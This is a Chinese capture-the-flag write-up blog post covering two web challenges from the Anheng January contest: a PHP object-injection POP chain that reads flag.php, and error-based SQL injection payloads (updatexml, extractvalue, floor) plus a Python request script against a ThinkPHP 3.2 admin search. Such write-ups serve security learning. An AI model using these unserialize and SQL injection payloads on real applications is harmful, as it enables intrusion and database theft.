安恒1月月赛

  1. 1. Web
    1. 1.1. babygo
    2. 1.2. Simple php

安恒1月月赛复现wp

Web

babygo

​ babygo(提交你找到的字符串的md5值)

题目源码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
<?php  
@error_reporting(1);
include 'flag.php';
class baby
{
protected $skyobj;
public $aaa;
public $bbb;
function __construct()
{
$this->skyobj = new sec;
}
function __toString()
{
if (isset($this->skyobj))
return $this->skyobj->read();
}
}

class cool
{
public $filename;
public $nice;
public $amzing;
function read()
{
$this->nice = unserialize($this->amzing);
$this->nice->aaa = $sth;
if($this->nice->aaa === $this->nice->bbb)
{
$file = "./{$this->filename}";
if (file_get_contents($file))
{
return file_get_contents($file);
}
else
{
return "you must be joking!";
}
}
}
}

class sec
{
function read()
{
return "it's so sec~~";
}
}

if (isset($_GET['data']))
{
$Input_data = unserialize($_GET['data']);
echo $Input_data;
}
else
{
highlight_file("./index.php");
}
?>

感觉是一叶飘零师傅出的题2333…还是学习到了一点知识的

这题考查的就是 PHP 对象注入,@l3m0n 师傅这篇写的比较好,其他 csdn 的博客写的简直惨不忍睹,php对象注入-pop链的构造,其实关键点就是反序列化可以控制类属性,无论是private还是public。我们可以在本地先生成自己需要的就好了

如下,直接把__construct方法里面的改成$this->skyobj = new cool;就可以调用 cool->read()了,然后直接用$this->amazing = NULL;绕过$this->nice->aaa === $this->nice->bbb,其实不传也可以,反正都是NULL,整个题就结束了

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
<?php  
// @error_reporting(1);
// include 'flag.php';
class baby
{
protected $skyobj;
public $aaa;
public $bbb;
function __construct()
{
$this->skyobj = new cool;
$this->amazing = NULL;
}
function __toString()
{
if (isset($this->skyobj))
return $this->skyobj->read();
}
}

class cool
{
public $filename = "flag.php";
public $nice;
public $amzing;
function read()
{
echo "Nice!";
$this->nice = unserialize($this->amzing);
$this->nice->aaa = $sth;
if($this->nice->aaa === $this->nice->bbb)
{
$file = "./{$this->filename}";
if (file_get_contents($file))
{
return file_get_contents($file);
}
else
{
return "you must be joking!";
}
}
}
}

class sec
{
function read()
{
return "it's so sec~~";
}
}

$obj = new baby;
echo urlencode(serialize($obj));
// $obj->aaa->amazing = new baby;

// if (isset($_GET['data']))
// {
// $Input_data = unserialize($_GET['data']);
// echo $Input_data;
// }
// else
// {
// highlight_file("./test.php");
// }
?>

Simple php

访问robots.txt发现有后台

1
2
3
4
5
6
User-agent: *

Disallow: /ebooks
Disallow: /admin
Disallow: /xhtml/?
Disallow: /center

访问admin,使用admin/12345678成功登录,登录后有一个搜索功能

结合页面thinkphp 3.2的框架漏洞,使用以下 payload 逐渐获得 flag

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
search[where]=3 and 1=updatexml(1,concat(0x7,(select schema_name from information_schema.schemata limit 3,1),0x7e),1);%23

search[where]=3 and 1=updatexml(1,concat(0x7,(select group_concat(table_name) from information_schema.tables where table_schema='tpctf'),0x7e),1);%23

search[where]=3 and 1=updatexml(1,concat(0x7,(select group_concat(flag) from flag),0x7e),1);%23

search[where]=3 and 1=updatexml(1,concat(0x7,(select flag from flag limit 0,1),0x7e),1);%23

search[where]=3 and 1=updatexml(1,concat(0x3a,(select flag from flag limit 0,1)),1);%23

search[where]=3 and extractvalue(1,concat(0x5c,(select flag from flag limit 0,1)));%23

search[where]=3 and (select 1 from (select count(),concat((select (select (select flag from flag limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)2))x from information_schema.tables group by x)a);%23


search[where]=3 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7,flag,0x7e) FROM flag limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a);%23

select 1 from(select count(*),concat((select (select (SELECT concat(0x7,flag,0x7e) FROM flag limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a

结果发现提交不对,然后看了其他师傅的 wp 发现少了一位,然后搜了一下相关资料,应该是限制了输出

尝试了很多,也用了floor尝试报错注入不限制输出,但是用floor本地成功了,但是一打服务就 pending 了,很是郁闷,最后用substr(str,32,1)得到了最后的一个数6

1
search[where]=3 and extractvalue(1,concat(0x5c,substr((select flag from flag limit 0,1),32,1)));%23

贴一下脚本:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
import HackRequests as hack
url = "http://101.71.29.5:10010/Admin/User/Index?search[where]=3%20and%20extractvalue(1,concat(0x5c,substr((select%20flag%20from%20flag%20limit%200,1),32,1)));%23"
loginurl = "http://101.71.29.5:10010/admin/index/login"
# hh = hack.httpraw(raw)
header = '''
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:65.0) Gecko/20100101 Firefox/65.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Pragma: no-cache
Cache-Control: no-cache
Cookie: PHPSESSID=6qm8l5phgs6hkva4fpndkp1p70; path=/
'''
proxy = ('185.32.44.22','80')
user = "user=admin&password=12345678"
# hh = hack.http(loginurl,headers=header,proxy=proxy,post=user)
hh = hack.http(url,headers=header,proxy=proxy)
print(hh.header)
print(hh.text())

顺便提一下,这个登录我看其他师傅 wp 是通过 sql 约束攻击登录 admin 账户的…并非弱口令,我猜 sql 语句应该是

1
select * from users where username = "xxx" and passowrd = "xxx"

而且注册密码是8位数的话,肯定应该有师傅是弄的 12345678 …2333


Article Author: Zeddy

Article Link: https://blog.zeddyu.info/2019/02/24/%E5%AE%89%E6%81%921%E6%9C%88%E6%9C%88%E8%B5%9B/index.html

Copyright Notice: With the exception of the special statement at the beginning of the article, all articles can be reprinted in accordance with the CC BY 4.0 agreement with the author's permission.

Flutter packages get 424问题解决方法 Hackim-2019 Web 记录

Comments